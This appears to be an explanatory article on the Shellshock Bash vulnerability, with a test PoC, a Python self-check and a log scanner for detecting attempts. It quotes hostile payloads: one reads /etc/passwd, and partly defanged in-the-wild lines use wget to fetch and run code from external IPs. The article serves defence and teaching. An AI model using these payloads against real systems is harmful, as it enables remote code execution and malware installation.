Shellshock refers to a series of vulnerabilities in GNU Bash (Bourne Again SHell), a command-line shell widely used in Unix-like systems, including Linux and macOS. The primary vulnerability, tracked as CVE-2014-6271, was publicly disclosed on September 24, 2014, by researcher Stéphane Chazelas.
At its core, Bash is more than just a command interpreter: it is often invoked by web servers (like Apache with CGI scripts), SSH, and DHCP clients, and in each case the caller hands untrusted data to Bash through environment variables. Shellshock exploits a flaw in how Bash imports function definitions from those variables, specifically when a value that starts with a function definition is followed by trailing commands.
In simple terms: Bash doesn’t properly parse certain environment variables, so an attacker who controls one of them can append code that Bash executes automatically when it starts. This isn’t just a theoretical issue; it affected millions of systems worldwide, from servers to embedded devices.
To understand the mechanics, let’s look at how Bash processes environment variables. Bash passes functions to child shells by exporting them as environment variables whose value begins with `() {`, like this:

```bash
() { echo "This is a function"; }
```
But in vulnerable Bash versions (up to 4.3), if you add commands after the function definition, Bash executes them unexpectedly. The bug lies in the parser: it doesn’t stop after the function closes, so any trailing code runs as a command.
Here’s a basic proof-of-concept (PoC) to demonstrate:

```bash
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
```

The same shape, a function definition followed by a trailing command, is what real payloads use:

```bash
() { :; }; echo ; /bin/bash -c "cat /etc/passwd"
```
- If the system is vulnerable, this will output “vulnerable” followed by “this is a test”.
- On a patched system, it just echoes “this is a test”.
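The test above wrapped into a small self-check, as an added example that is not part of the original post: it runs the PoC against a Bash binary under a controlled environment and reports the result instead of relying on a human reading the output. The function name `check_shellshock` and the optional `bash_path` parameter are assumptions of this example.

```python
import shutil
import subprocess


def check_shellshock(bash_path=None):
    """Run the classic CVE-2014-6271 test against a Bash binary.

    Returns "vulnerable" if the trailing command in the crafted
    environment variable was executed, "patched" if it was not, and
    "unavailable" if no Bash binary could be found or run.
    (Hypothetical helper written for this example.)
    """
    bash = bash_path or shutil.which("bash")
    if bash is None:
        return "unavailable"

    # The variable value is a function definition followed by a trailing
    # command. A vulnerable Bash runs "echo vulnerable" while importing the
    # function; a patched Bash ignores everything after the closing brace.
    # Only PATH and the test variable are passed, so nothing else in the
    # parent environment can influence the result.
    env = {"PATH": "/usr/bin:/bin", "x": "() { :;}; echo vulnerable"}
    try:
        proc = subprocess.run(
            [bash, "-c", "echo this is a test"],
            env=env,
            capture_output=True,
            text=True,
            timeout=10,
        )
    except (OSError, subprocess.SubprocessError):
        return "unavailable"

    # Patched builds may print a warning on stderr; the decisive signal is
    # the literal line "vulnerable" on stdout, so only stdout is inspected.
    return "vulnerable" if "vulnerable" in proc.stdout.splitlines() else "patched"


if __name__ == "__main__":
    print(check_shellshock())
```

Running this on a fleet (for example through a configuration-management tool) gives a machine-readable inventory of which hosts still need the Bash update, which is more reliable than grepping package versions because it tests the behaviour itself.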
In some cases, the exploit attempt is clearly visible in HTTP headers such as the Host header (these are defanged payloads observed in the wild):

```
() { :; }; /bin/ping -c 3 109.235.51.42
() { :; }; /usr/bin/env wget hxxp://173.193.139.2/host
() { :; }; wget 37.187.225.119/a; wget 37.187.225.119/action.php > /var/www/
() { :;}; wget -O /tmp/syslogd hxxp://69.163.37.115/nginx; chmod 777 /tmp/syslogd; /tmp/syslogd;
```
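Because every payload above starts with the `() {` function-definition marker, that marker is the natural thing to hunt for in web server logs. The following is an added example, not code from the original post: it parses Apache combined-format log lines and flags any request, Referer or User-Agent field carrying the marker, tolerating the whitespace variants seen above (`() { :; }`, `() { :;}`). The log lines, IP addresses and the names `find_shellshock_attempts` and `parse_combined_log` are constructed for this example.

```python
import re

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# The Shellshock marker: "()" then "{" with optional whitespace in between.
_MARKER = re.compile(r"\(\s*\)\s*\{")

# Constructed sample log lines (documentation IP ranges, no real hosts).
LOG_LINES = [
    '203.0.113.5 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "() { :; }; /bin/ping -c 3 192.0.2.10"',
    '198.51.100.7 - - [25/Sep/2014:10:12:03 +0000] "GET /index.html HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [25/Sep/2014:10:12:05 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '404 210 "() { :;}; echo vulnerable" "curl/7.37.0"',
    "this line is not in combined format and is skipped",
]


def parse_combined_log(line):
    """Return a dict of fields for one combined-format line, or None."""
    match = _COMBINED.match(line)
    return match.groupdict() if match else None


def find_shellshock_attempts(lines):
    """Scan log lines and return one record per field carrying the marker.

    Each record holds the source IP, the field the payload appeared in and the
    payload text itself, which is enough to pivot into blocking or alerting.
    """
    hits = []
    for number, line in enumerate(lines, start=1):
        fields = parse_combined_log(line)
        if fields is None:
            continue  # unparseable lines are skipped, not treated as attacks
        for field in ("request", "referer", "user_agent"):
            if _MARKER.search(fields[field]):
                hits.append(
                    {
                        "line": number,
                        "ip": fields["ip"],
                        "field": field,
                        "payload": fields[field],
                    }
                )
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_attempts(LOG_LINES):
        print(f"line {hit['line']}: {hit['ip']} via {hit['field']}: {hit['payload']}")
```

The default combined format does not record the Host header that the payloads above were seen in; to catch those, add `%{Host}i` to the Apache `LogFormat` (or log at the reverse proxy) and extend the field list accordingly. A hit is a strong indicator of an attempt, not of success; correlate it with the response status and with any outbound connections from the web server around the same timestamp.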